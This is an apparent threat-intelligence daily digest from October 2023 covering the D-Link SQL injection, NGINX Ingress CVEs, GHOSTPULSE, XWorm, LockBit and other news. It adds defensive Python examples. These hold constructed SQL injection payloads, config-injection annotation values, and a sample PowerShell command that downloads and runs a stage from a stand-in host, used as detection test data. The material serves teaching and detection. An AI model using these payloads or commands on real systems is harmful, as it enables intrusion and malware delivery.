Daily Drop (638): India SAT: O3b mPOWER, Lazarus Group: TTP, D-Link DAR-7000, NGINX Ingress Controller, GHOSTPULSE Malware, Alan Turing's, LockBit: Boeing, XWorm, ARM, Terrorist: Crypto Financing
10-30-23
Monday, Oct 30, 2023 // (IG): BB // The Leek Sino-Satire // Coffee for Bob
India's First Satellite-based Gigabit Service Aims to Connect the Unconnected
Bottom Line Up Front (BLUF): Indian telco Reliance Jio Infocomm, known as Jio, showcased its new satellite broadband service, JioSpaceFiber, at the India Mobile Congress, marking it as India's first satellite-based gigabit service.
Analyst Comments: Jio's partnership with SES, owner of the O3b constellation of medium earth orbit (MEO) satellites, aims to provide gigabit-level connections similar to terrestrial fiber broadband connections. SES's O3b mPOWER satellites can scale to multiple gigabits per second, a significant improvement from their original generation. However, there have been launch delays due to reported glitches. JioSpaceFiber expands Jio's broadband services portfolio, aiming to cover unserved areas in India. Reliance Jio Infocomm chair, Akash Ambani, emphasized the potential reach of JioSpaceFiber. Jio also plans to use O3b for mobile backhaul capacity enhancement for Jio True5G in remote parts of India. The company has already connected JioSpaceFiber in four remote locations, which will serve as pilot areas before a proposed 2024 commercial service launch. The timeline might be influenced by the Department of Telecommunications (DoT) decisions regarding spectrum availability for commercial broadband satellite services in India.
FROM THE MEDIA: Reliance Jio Infocomm unveiled its satellite broadband service, JioSpaceFiber, in partnership with SES, aiming to provide gigabit-level connections. The service is a part of Jio's strategy to expand its broadband reach in unserved areas of India. The company aims for a full commercial launch in 2024, but regulatory decisions on spectrum availability might influence this timeline.
READ THE STORY: Developing Telecoms
Repeated Exploits Emphasize the Persistent Threat of the Lazarus Group and the Importance of Timely Patching
Bottom Line Up Front (BLUF): The Lazarus Group, attributed to North Korea, has launched a new campaign that exploits known vulnerabilities in a legitimate software product Kaspersky has declined to name: a product whose job is to encrypt web communication with digital certificates. Patches exist, but the targeted organizations were still running the older, vulnerable version. By exploiting it, the group installs malware and establishes a foothold in the victim's environment.
Analyst Comments: Kaspersky researchers found the Lazarus Group targeting organizations worldwide through previously disclosed vulnerabilities in a single software product. Although the flaws had been reported and patched, the victims were still running the older version, which is widely deployed precisely because it encrypts web communication with digital certificates, making it a trusted and attractive foothold. The campaign aligns with North Korea's broader use of cyber intrusions for espionage, financial gain and intelligence collection; proceeds from such operations are alleged to fund the country's missile and nuclear weapons programs. The group's malware, dubbed "SIGNBT," handles initial infection, victim profiling and payload delivery. The vendor of the affected software has itself been breached by Lazarus several times before, which points to a persistent interest, most likely in stealing source code or tampering with the software supply chain. The practical lesson is that a known, patched vulnerability stays exploitable for exactly as long as the unpatched version remains in service.
FROM THE MEDIA: North Korean hackers from the Lazarus Group have launched a new campaign, focusing on exploiting known vulnerabilities in a specific software product. These vulnerabilities had been reported and patched, yet the group persists in targeting them. Their actions underscore a broader strategic approach by North Korea to leverage cyber capabilities for espionage, financial gains, and power projection. The ongoing and evolving nature of these threats necessitates a heightened level of awareness and preparedness among organizations and cybersecurity professionals.
READ THE STORY: GovInfoSec
D-Link DAR-7000 Faces Critical SQL Injection Vulnerability: CVE-2023-42406
Bottom Line Up Front (BLUF): A critical SQL injection vulnerability has been identified in the D-Link DAR-7000 device. This flaw allows malicious actors to exploit the vulnerability, potentially gaining unauthorized access to databases, modifying or deleting data, and obtaining administrative privileges on affected devices. A Proof-of-Concept (PoC) for this vulnerability has been published on GitHub, highlighting the risk associated with this flaw. The vulnerability has been officially designated as CVE-2023-42406.
Analyst Comments: The SQL injection flaw in the D-Link DAR-7000 is a significant risk. SQL injection lets an attacker append to or rewrite the SQL statements an application sends to its database, compromising the confidentiality, integrity and availability of the data behind it; the technique works against MySQL, MSSQL, Oracle and other backends alike, and depending on what the application stores it can be used to read, modify or delete data or to reach administrative functions. Here the injection point is the /sysmanage/editrole.php endpoint, and the published PoC shows how little effort exploitation takes once the parameter is known. As the Lazarus item above illustrates, known flaws with patches available remain attractive targets for as long as unpatched systems stay in service, so the urgency of patching does not depend on the sophistication of the bug.
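To make the bug class concrete, the following is an added example written for this digest; it is not D-Link firmware and not the GitHub PoC. An in-memory SQLite table (constructed) stands in for the device's role store, and the role_id parameter stands in for whatever the vulnerable endpoint reads from the request. The vulnerable and hardened lookups sit side by side so the difference is visible.

```python
# Added example for this digest: not D-Link code and not the public PoC.
# An in-memory SQLite table (constructed) stands in for the device's role
# store; role_id stands in for the request parameter the endpoint reads.
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE roles (id INTEGER, name TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO roles VALUES (?, ?, ?)",
        [(1, "viewer", 0), (2, "operator", 0), (3, "admin", 1)],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, role_id: str) -> list:
    # The bug class reported for editrole.php: request input is spliced
    # straight into the statement, so the input can rewrite the query.
    sql = f"SELECT id, name, is_admin FROM roles WHERE id = {role_id}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, role_id: str) -> list:
    # Hardened form: validate the shape, then bind the value. A bound
    # parameter is always data; it can never change the SQL grammar.
    if not role_id.isdigit():
        raise ValueError("role_id must be a positive integer")
    return conn.execute(
        "SELECT id, name, is_admin FROM roles WHERE id = ?", (int(role_id),)
    ).fetchall()


# Two payload shapes a tester tries first (constructed for the demo).
TAUTOLOGY = "1 OR 1=1"                                       # returns every row
SCHEMA_DUMP = "0 UNION SELECT 0, sql, 0 FROM sqlite_master"  # reads DB metadata


def demo() -> dict:
    conn = make_db()
    result = {
        "normal": vulnerable_lookup(conn, "1"),
        "tautology_rows": len(vulnerable_lookup(conn, TAUTOLOGY)),
        "schema_leak": vulnerable_lookup(conn, SCHEMA_DUMP)[0][1],
    }
    try:
        safe_lookup(conn, TAUTOLOGY)
        result["safe_rejected"] = False
    except ValueError:
        result["safe_rejected"] = True
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The UNION payload is the part worth noticing: it does not need the application to show an error, only to return rows, which is why a "harmless" role-lookup page can leak the whole schema. Parameter binding closes both payloads at once; the numeric check on top is defence in depth, not the fix.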
FROM THE MEDIA: D-Link's DAR-7000 device is currently vulnerable to SQL injection attacks, which can have far-reaching consequences, including unauthorized data access and potential system compromise. The vulnerability, assigned CVE-2023-42406, is being analyzed to understand its potential impact fully. A PoC has been shared on GitHub, showcasing the exploitation process. Organizations using the D-Link DAR-7000 device are advised to apply necessary patches and remain vigilant against potential exploitation attempts.
READ THE STORY: GBhackers
NGINX Ingress Controller for Kubernetes: Vulnerabilities
Bottom Line Up Front (BLUF): Three unpatched high-severity vulnerabilities have been identified in the NGINX Ingress controller for Kubernetes. An attacker who can create or modify Ingress objects can exploit them to steal sensitive cluster credentials.
Analyst Comments: The three flaws are CVE-2022-4886, a bypass of ingress-nginx path sanitization that can expose the credentials held by the ingress-nginx controller; CVE-2023-5043, an annotation injection that can lead to arbitrary command execution; and CVE-2023-5044, a code injection triggered through a nginx.ingress.kubernetes.io annotation. The common thread is that values an Ingress author controls (paths and annotations) are rendered into the controller's NGINX configuration, so anyone permitted to create or modify Ingress objects can make the controller act with the privileges it holds, including reading secrets from the cluster. Given how widely the NGINX controller is deployed, and that the right to create Ingress objects is routinely granted to application teams, this is a significant concern for many organizations.
FROM THE MEDIA: The NGINX Ingress controller for Kubernetes has three high-severity security flaws. If left unaddressed, threat actors could exploit them to extract secret credentials from the cluster, posing a significant risk to data integrity and security. No patches are available yet; mitigations have been published, but the underlying issues illustrate how hard it is to keep tenant-controlled configuration out of a privileged component in a system as complex as Kubernetes.
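One practical control while the flaws remain unpatched is to refuse Ingress objects whose annotations or paths could reach the generated NGINX configuration. The following is an added example written for this digest, not ingress-nginx project code: a policy check of the kind an admission webhook or CI gate would run. The annotation keys are ingress-nginx's real ones; the policy rules, the regular expressions and the sample Ingress objects are constructed and are assumptions of this example.

```python
# Added example, not ingress-nginx project code: a pre-admission policy that
# rejects the annotation and path shapes the three CVEs rely on. The
# annotation keys are the real ingress-nginx ones; the policy itself and the
# sample Ingress objects are constructed for this digest.
import re

SNIPPET_ANNOTATIONS = {
    "nginx.ingress.kubernetes.io/configuration-snippet",
    "nginx.ingress.kubernetes.io/server-snippet",
}
REDIRECT_ANNOTATION = "nginx.ingress.kubernetes.io/permanent-redirect"

# A redirect target should be exactly one absolute URL: no whitespace or ';'
# that could end the generated directive, no '$' that NGINX would expand.
SAFE_REDIRECT = re.compile(r"^https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[A-Za-z0-9._~/%?=&\-]*)?$")
# Paths end up inside generated location blocks, so allow only a plain
# absolute path (CVE-2022-4886 turned on unsanitised path values).
SAFE_PATH = re.compile(r"^/[A-Za-z0-9._~/\-]*$")


def audit_ingress(ingress: dict) -> list:
    """Return policy violations for one Ingress object (empty list = accept)."""
    meta = ingress.get("metadata", {})
    name = meta.get("name", "<unnamed>")
    findings = []
    for key, value in (meta.get("annotations") or {}).items():
        if key in SNIPPET_ANNOTATIONS:
            findings.append(f"{name}: snippet annotation {key} is not allowed")
        elif key == REDIRECT_ANNOTATION and not SAFE_REDIRECT.match(value):
            findings.append(f"{name}: unsafe {REDIRECT_ANNOTATION} value {value!r}")
    for rule in ingress.get("spec", {}).get("rules", []):
        for entry in rule.get("http", {}).get("paths", []):
            path = entry.get("path", "/")
            if not SAFE_PATH.match(path):
                findings.append(f"{name}: unsafe path {path!r}")
    return findings


def _ingress(name: str, annotations: dict = None, path: str = "/") -> dict:
    # Constructed minimal Ingress in the shape the API server returns.
    return {
        "metadata": {"name": name, "annotations": annotations or {}},
        "spec": {"rules": [{"http": {"paths": [{"path": path}]}}]},
    }


GOOD = _ingress("shop", {REDIRECT_ANNOTATION: "https://shop.example.test/new"})
SNIPPET = _ingress("shop-snippet",
                   {"nginx.ingress.kubernetes.io/configuration-snippet": "return 200;"})
# Constructed abuse shape: a semicolon and newline let the value step out of
# the redirect directive and continue the config on its own terms.
BAD_REDIRECT = _ingress("shop-redirect",
                        {REDIRECT_ANNOTATION: "https://example.test/;\n  access_log off;"})
BAD_PATH = _ingress("shop-path", path="/api $request_uri;")

if __name__ == "__main__":
    for obj in (GOOD, SNIPPET, BAD_REDIRECT, BAD_PATH):
        print(obj["metadata"]["name"], "->", audit_ingress(obj) or "ok")
```

Two caveats. The controller-side equivalent of the snippet rule is setting allow-snippet-annotations to "false" in the ingress-nginx ConfigMap, which should be done regardless of any admission check; and the path allowlist above is deliberately strict, so clusters that rely on regex paths (the use-regex annotation) will need a looser rule that still excludes whitespace, "$", ";" and quotes.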
READ THE STORY: THN
Counterfeit MSIX App Packages Used to Spread GHOSTPULSE Malware
Bottom Line Up Front (BLUF): A new malware loader named GHOSTPULSE has been discovered being distributed through counterfeit MSIX Windows app package files of popular software such as Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex. Once unsuspecting users install these malicious packages, GHOSTPULSE is stealthily downloaded onto the compromised system. The malware has the ability to initiate the execution of various final payloads, including SectopRAT, Rhadamanthys, Vidar, Lumma, and NetSupport RAT.
Analyst Comments: The campaign uses MSIX Windows app packages as the delivery mechanism for GHOSTPULSE. MSIX is the package format developers use to build and distribute Windows applications, and Windows only installs packages that are signed, so running this campaign requires access to purchased or stolen code signing certificates, which the attackers evidently have. Targets are steered to the malicious packages through compromised websites, SEO poisoning or malvertising. Launching the MSIX file prompts the user to click "Install"; if they comply, a PowerShell script fetches GHOSTPULSE from a remote server. The infection is multi-staged: a TAR archive contains an executable that poses as the Oracle VM VirtualBox service but is in fact a legitimate, signed binary belonging to Notepad++, alongside a tampered DLL. The legitimate executable loads the attacker's DLL from its own directory (DLL side-loading), which advances the infection; the final stage loads GHOSTPULSE, which then acts as a loader for whichever payload the operator has chosen. Because the signed binary itself is clean, controls that trust a file on the strength of its signature alone will not stop the chain.
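One cheap triage step against this kind of counterfeit package follows from how MSIX signing works: Windows requires the Publisher attribute in the package manifest to match the subject of the signing certificate, so a fake "Chrome" signed with a bought or stolen certificate still has to name that certificate's subject, not the vendor's. The following is an added example written for this digest, not code from the Elastic write-up or from any vendor: it opens an MSIX (a ZIP) and checks the claimed app name against an expected-publisher table. The table, the sample packages and the publisher subjects are constructed; the manifest namespace is the real MSIX one.

```python
# Added example, written for this digest rather than taken from the GHOSTPULSE
# write-up: open an MSIX package (a ZIP), read AppxManifest.xml, and compare the
# app name it claims with the Publisher subject it carries. The allowlist and
# the sample packages are constructed; real vendor subjects differ.
import io
import zipfile
import xml.etree.ElementTree as ET

APPX_NS = "{http://schemas.microsoft.com/appx/manifest/foundation/windows10}"

# Constructed allowlist: hypothetical subjects, not the vendors' real ones.
EXPECTED_PUBLISHER = {
    "ExampleVendor.Browser": "CN=Example Browser Vendor, O=Example Browser Vendor",
    "ExampleVendor.Grammar": "CN=Example Grammar Co, O=Example Grammar Co",
}


def read_identity(msix_bytes: bytes) -> dict:
    """Pull Name/Publisher/Version from the package's Identity element."""
    with zipfile.ZipFile(io.BytesIO(msix_bytes)) as pkg:
        root = ET.fromstring(pkg.read("AppxManifest.xml"))
    ident = root.find(f"{APPX_NS}Identity")
    if ident is None:
        raise ValueError("AppxManifest.xml has no Identity element")
    return {
        "name": ident.get("Name"),
        "publisher": ident.get("Publisher"),
        "version": ident.get("Version"),
    }


def triage(msix_bytes: bytes) -> list:
    """Return findings for one package; an empty list means the identity is consistent."""
    ident = read_identity(msix_bytes)
    expected = EXPECTED_PUBLISHER.get(ident["name"])
    if expected is None:
        return [f"unknown package name {ident['name']!r}: not on the allowlist"]
    if ident["publisher"] != expected:
        return [f"{ident['name']} names publisher {ident['publisher']!r}, expected {expected!r}"]
    return []


def build_msix(name: str, publisher: str, version: str = "1.0.0.0") -> bytes:
    # Constructed, unsigned package containing only the manifest, for the demo.
    manifest = (
        f'<Package xmlns="{APPX_NS[1:-1]}">'
        f'<Identity Name="{name}" Publisher="{publisher}" Version="{version}"/>'
        "</Package>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("AppxManifest.xml", manifest)
    return buf.getvalue()


GENUINE = build_msix("ExampleVendor.Browser", EXPECTED_PUBLISHER["ExampleVendor.Browser"])
COUNTERFEIT = build_msix("ExampleVendor.Browser", "CN=Some Trading Ltd, O=Some Trading Ltd")

if __name__ == "__main__":
    for label, pkg in (("genuine", GENUINE), ("counterfeit", COUNTERFEIT)):
        print(label, "->", triage(pkg) or "identity consistent")
```

This check reads the manifest only; it does not verify the signature, so on a Windows host it belongs next to a real signature check (for example Get-AuthenticodeSignature on the package) and, where the environment allows it, an installer policy that only accepts packages from known publishers. Its value is that it catches the "right name, wrong signer" pattern a stolen or purchased certificate produces, before the user ever sees the Install button.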
FROM THE MEDIA: A novel malware loader, GHOSTPULSE, is being distributed through counterfeit MSIX Windows app packages. The malware can lead to significant breaches, given its capability to load various other malware types. Users are advised to be wary of unsolicited MSIX package downloads and to ensure that software is downloaded from trusted sources.
READ THE STORY: THN
Alan Turing's Diagonalization: Unraveling the Uncomputable
Bottom Line Up Front (BLUF): Alan Turing showed that some problems, though precisely defined, cannot be solved by any algorithm; they are "uncomputable." He did so with a mathematical technique called diagonalization. Powerful as it is, diagonalization has known limits: it cannot on its own settle questions such as the P versus NP problem in computational complexity theory.
Analyst Comments: Algorithms are woven into daily life, solving optimization and decision problems across many domains, but not every precisely stated problem has an algorithmic solution. Turing proved that certain problems, though defined in exact mathematical terms, are uncomputable. His strategy was diagonalization, a technique that first shows up in a mundane finite problem: given a list of n bit strings, each n bits long, produce a string that is not on the list. Flipping the i-th bit of the i-th string does it in n steps, rather than checking candidate after candidate against every entry, and the same construction works for infinite strings and infinite lists. Turing adapted the method from Georg Cantor, who used it in set theory to show that some infinities are larger than others. In Turing's hands it took on a contrarian character: assume a complete list of algorithms, build a problem that disagrees with each one on some input, and conclude that no algorithm solves it.
FROM THE MEDIA: Alan Turing's use of diagonalization established that some problems cannot be solved algorithmically. The method is potent in theory, but it has limits: open questions such as P versus NP have so far resisted it.
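The finite version of the argument is small enough to run. The following is an added example written for this digest, not code from the Wired piece: the diagonal construction on n strings of n bits, the brute-force alternative it replaces, and the same move applied to a list of functions, which is the shape Turing's argument takes. The sample strings and functions are constructed.

```python
# Added example written for this digest (not from the Wired article): the
# finite diagonal construction, the naive alternative, and the same move
# applied to a list of functions, which is the shape of Turing's argument.


def diagonal_string(strings: list) -> str:
    """Given n bit strings of length n, return a length-n string not on the list."""
    n = len(strings)
    if any(len(s) != n or set(s) - {"0", "1"} for s in strings):
        raise ValueError("need n strings of exactly n bits each")
    # Flip the i-th bit of the i-th string: the result differs from string i
    # at position i, for every i, so it cannot equal any entry. n steps total.
    return "".join("1" if strings[i][i] == "0" else "0" for i in range(n))


def brute_force_missing(strings: list) -> str:
    """The naive alternative: enumerate candidates until one is absent."""
    n = len(strings)
    present = set(strings)
    for k in range(2 ** n):
        candidate = format(k, f"0{n}b")
        if candidate not in present:
            return candidate
    raise AssertionError("unreachable: 2**n candidates, only n are listed")


def diagonal_function(functions: list):
    """Return g with g(i) != functions[i](i) for every i, so g matches no entry.

    Turing's step: suppose the list were 'every computable function'. g is
    still computable from the list, yet it is on the list nowhere, so no
    such complete list can exist and some problems have no algorithm."""
    def g(i: int) -> bool:
        return not functions[i](i)
    return g


if __name__ == "__main__":
    sample = ["0110", "1010", "0000", "1111"]  # constructed n=4 input
    print("diagonal:", diagonal_string(sample))
    print("brute force:", brute_force_missing(sample))
    fs = [lambda i: i % 2 == 0, lambda i: i > 1, lambda i: True]  # constructed
    g = diagonal_function(fs)
    print("g disagrees with every f_i at i:", [g(i) != fs[i](i) for i in range(len(fs))])
```

The contrast is the point: brute force has to look at up to 2**n candidates, the diagonal never looks at a candidate at all, it manufactures one. Cantor's infinite version and Turing's uncomputability proof are the same construction with the list allowed to be infinite.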
READ THE STORY: Wired
Boeing Under Ransomware Siege: LockBit's Latest High-Profile Target
Bottom Line Up Front (BLUF): LockBit ransomware gang claims to have extracted sensitive data from aerospace giant Boeing and threatens to release it unless engaged by November 2nd. The potential ramifications of this breach are vast, considering Boeing's extensive work with military clients.
Analyst Comments: The ransomware group, LockBit, has an established history of successful cyberattacks, having earned an estimated $91 million from U.S. victims since 2020. Boeing's involvement in projects of national significance, such as the construction of aircraft for the U.S. President, magnifies the potential implications of this breach. It's crucial to understand the gravity of this threat and consider it in the context of LockBit's track record and Boeing's pivotal role in the aerospace and defense sectors.
FROM THE MEDIA: The notorious ransomware gang, LockBit, has reportedly breached Boeing, extracting a significant amount of sensitive data. They've set a deadline for Boeing to respond, post which they threaten data exposure. This incident comes alongside other cybersecurity threats like the breach in Las Vegas's Clark County School District and vulnerabilities in major software. The situation underscores the persistent and sophisticated nature of cyber threats that major corporations and institutions face.
READ THE STORY: The Register
XWorm: The Evolving Threat of Malware-as-a-Service
Bottom Line Up Front (BLUF): XWorm, a Remote Access Trojan (RAT) sold as malware-as-a-service, is being used for multi-stage attacks. Originating from the ex-USSR in July 2022, the malware has evolved to version 5.0 as of August 2023 and poses a threat by stealing sensitive data, launching DDoS attacks, and deploying ransomware.
Analyst Comments: XWorm's capabilities are broad. It can extract sensitive data, including cryptocurrency wallet information, launch DDoS attacks and deploy ransomware. The malware has received steady updates, a sign that its developers intend to keep it current and hard for defenders to counter. It is distributed mainly through phishing emails carrying malicious Word documents and uses a multi-stage chain: opening the document triggers a download that fetches XWorm onto the victim's system. Its features include encrypted communication with its C2 server, user activity tracking, information gathering and account hijacking, among others. It is built to persist: it bypasses User Account Control (UAC) to elevate its privileges and registers itself among the system's startup programs.
FROM THE MEDIA: XWorm represents a severe threat. Its ability to evolve, combined with its multi-stage delivery and broad feature set, makes it a formidable piece of malware. Its origin in the former Soviet bloc and its continuous development point to a well-organized, commercially run operation rather than a one-off project. The detailed ANY.RUN report provides deeper insight into its workings; organizations and individuals should remain vigilant and apply layered security controls against threats of this kind.
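Two of the steps above, the Word document spawning a downloader and the malware registering itself at startup, are reliably visible in endpoint telemetry. The following is an added example written for this digest, not code from the ANY.RUN report: two detections run over constructed endpoint events. The field names follow a Sysmon-like shape and are an assumption of this example, not any vendor's schema; the sample events and the example.test URL are constructed.

```python
# Added example, not from the ANY.RUN report: two detections that match the
# XWorm delivery and persistence steps described above, run over constructed
# endpoint events. Field names follow a Sysmon-like shape and are an
# assumption of this example, not a vendor schema.

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
RUN_KEYS = (
    "hkcu\\software\\microsoft\\windows\\currentversion\\run",
    "hklm\\software\\microsoft\\windows\\currentversion\\run",
)
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Return (rule, pid, detail) tuples for events that match a rule."""
    alerts = []
    for ev in events:
        if ev["type"] == "process_create":
            # Stage one of the chain: a document viewer should not be launching a
            # script interpreter that then pulls the RAT from the internet.
            if _basename(ev["parent_image"]) in OFFICE_APPS and _basename(ev["image"]) in SCRIPT_HOSTS:
                alerts.append(("office-spawns-script-host", ev["pid"], ev["command_line"]))
        elif ev["type"] == "registry_set":
            # Persistence: a new autorun value under HKCU/HKLM ...\CurrentVersion\Run.
            if ev["target"].lower().startswith(RUN_KEYS):
                alerts.append(("run-key-persistence", ev["pid"], ev["target"]))
        elif ev["type"] == "file_create":
            # Persistence: a dropper placed in the per-user Startup folder.
            if STARTUP_DIR in ev["path"].lower():
                alerts.append(("startup-folder-persistence", ev["pid"], ev["path"]))
    return alerts


# Constructed sample telemetry: one benign chain and one matching the described attack.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 4100, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "WINWORD.EXE /n invoice.docm"},
    {"type": "process_create", "pid": 4188,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -nop -c IEX((New-Object Net.WebClient)"
                     ".DownloadString('http://example.test/stage2'))"},
    {"type": "registry_set", "pid": 5012,
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"type": "file_create", "pid": 5012,
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svc.vbs"},
    {"type": "process_create", "pid": 6000, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The first rule fires early, at the download stage, which is where blocking still prevents the infection; the two persistence rules fire late but are far less noisy, since few legitimate installers write Run keys or Startup-folder scripts from a process tree rooted in a document. Tuning belongs on the parent/child pairs, not on command-line strings, because the encoded PowerShell in such campaigns changes per sample.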
READ THE STORY: GBhackers
Rethinking PC Dominance: The Rise of Arm-Compatible Devices
Bottom Line Up Front (BLUF): Intel's CEO, Pat Gelsinger, may be downplaying the rising influence of Arm-compatible PCs in the market. Given the current advancements and adoption rate of Arm technologies by major players like Apple, Qualcomm, and potentially Nvidia and AMD, there's a tangible shift in the PC landscape that suggests Arm's presence might grow significantly, challenging Intel's long-standing dominance.
Analyst Comments: Despite Pat Gelsinger's assertions that Arm PCs are an "insignificant" threat to Intel, the evolution and success of Arm-compatible chips in recent years suggest otherwise. Apple's M-series chips have showcased both performance and efficiency, often rivaling or exceeding Intel and AMD processors. Qualcomm is also entering the fray with its Snapdragon X Elite, boasting competitive performance metrics. With industry giants like Nvidia and possibly AMD exploring Arm-compatible CPUs and Microsoft's increasing support for Arm, the PC landscape could be on the cusp of a significant shift.
FROM THE MEDIA: Historically, x86 wasn't always the dominant PC architecture. Apple's transition from PowerPC to Intel in 2006 solidified x86's position. However, recent advancements by companies like Apple and Qualcomm in Arm-compatible chips indicate a potential shift in the market dynamics. Apple's M-series chips, for instance, have proven to be both powerful and efficient. Qualcomm's new Snapdragon X Elite SoC also promises competitive performance against Intel, AMD, and Apple. With rumors of Nvidia and AMD exploring Arm-compatible CPUs and Microsoft's growing support for Arm, the future of the PC market may see a larger presence of Arm-compatible devices, challenging Intel's dominance.
READ THE STORY: The Register
The Debate on 'Harvest Now, Decrypt Later' Attacks in the Age of Quantum Computing
Bottom Line Up Front (BLUF): Cybercriminals may already be collecting encrypted data with the intention of decrypting it in the future when quantum computers are capable of breaking current encryption standards. This strategy, termed "harvest now, decrypt later" (HNDL), is an emerging concern for cybersecurity experts, as quantum advancements could potentially expose vast amounts of sensitive data.
Analyst Comments: The point of post-quantum cryptography is to be ready before a quantum computer can break RSA and the other public-key algorithms that protect today's traffic. The worry is that adversaries are recording encrypted data now, intending to decrypt it once quantum computing reaches that stage. Experts and organizations such as Deloitte acknowledge HNDL as a theoretical threat, but there is no concrete evidence that such collection is happening today. Western governments and companies are not waiting to find out: work on post-quantum encryption standards has been accelerated, with the US National Institute of Standards and Technology (NIST) collaborating with cryptographers worldwide, and the Quantum Computing Cybersecurity Preparedness Act signed by President Biden is one example of the preparatory steps being taken. The practical implication for defenders is that the sensitivity horizon of data matters: anything that must stay confidential for longer than the expected arrival of a cryptographically relevant quantum computer is already exposed to HNDL if it crosses the network under classical key exchange.
FROM THE MEDIA: Quantum computing poses a potential threat to the current encryption standards, with the possibility of making them obsolete. The HNDL approach, where data is collected now for decryption in the future, is a looming concern. While there's a debate on whether such attacks are currently happening, the consensus is clear on the need for quantum-safe encryption strategies. Governments and corporations are actively investing in research and measures to counteract future quantum decryption capabilities.
READ THE STORY: TechMonitor
Items of interest
Debates Intensify Over Cryptocurrency's Role in Financing Terrorist Activities
Bottom Line Up Front (BLUF): The U.S. government is intensifying its scrutiny on cryptocurrency firms that don't take adequate measures to prevent terrorist groups from moving funds. Deputy Treasury Secretary Wally Adeyemo emphasized that actions would be taken against non-compliant firms. This follows concerns raised by Sen. Elizabeth Warren and other members of Congress regarding the potential use of cryptocurrencies by terrorist groups.
Analyst Comments: The debate on the role of cryptocurrency in financing terrorism has garnered significant attention in Washington. Sen. Elizabeth Warren cited a report suggesting that terror groups, including Hamas and Palestinian Islamic Jihad, might have raised substantial funds in cryptocurrency. However, firms like Elliptic, which contributed data to that report, have contested the accuracy of the figures, arguing that the amount actually raised through cryptocurrency is likely far smaller than the numbers cited. Cryptocurrency's pseudonymous and borderless nature has long concerned critics who see it as exploitable by terror groups. The counterpoint is the transparency of public blockchain ledgers, on which every transaction is recorded and can be traced; Hamas discontinuing Bitcoin fundraising over tracking concerns is a recent case in point. While the potential for cryptocurrency to be used in illicit activity cannot be dismissed, determining the actual scale and impact remains difficult.
FROM THE MEDIA: As cryptocurrencies become more mainstream, their potential misuse, especially in the context of terror financing, is under the lens. While there is an acknowledgment of this risk, there's also a debate on the scale of the problem. Efforts are being made both within the government and the crypto industry to address these concerns, ensuring that the digital financial world remains secure and doesn't inadvertently aid malicious actors.
READ THE STORY: Seattle Times
Terrorism and Crypto: Evidence from Ex-CIA Analyst (Video)
FROM THE MEDIA: Terrorist organizations have been testing cryptocurrency as a source of funding since it allows instant cross-border, censorship-resistant payments. Still, is Bitcoin really a sustainable source of funding for terrorists? To find out, we reached out to former CIA analyst Yaya Fanusie and Itsik Levy, CEO at Whitestream, a blockchain intelligence agency.
Michael Lewis on The Rise and Fall of FTX and Sam Bankman-Fried (Video)
FROM THE MEDIA: Michael Lewis is the renowned author of bestselling masterpieces, including Moneyball, The Big Short, Flash Boys and Liar’s Poker. This autumn, he is set to release his most anticipated book to date, which is likely to be one of 2023’s biggest sellers – Going Infinite: The Rise and Fall of a New Tycoon, a gripping, real-time narrative chronicling the enigmatic protagonist behind one of the most catastrophic financial meltdowns of the 21st century.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.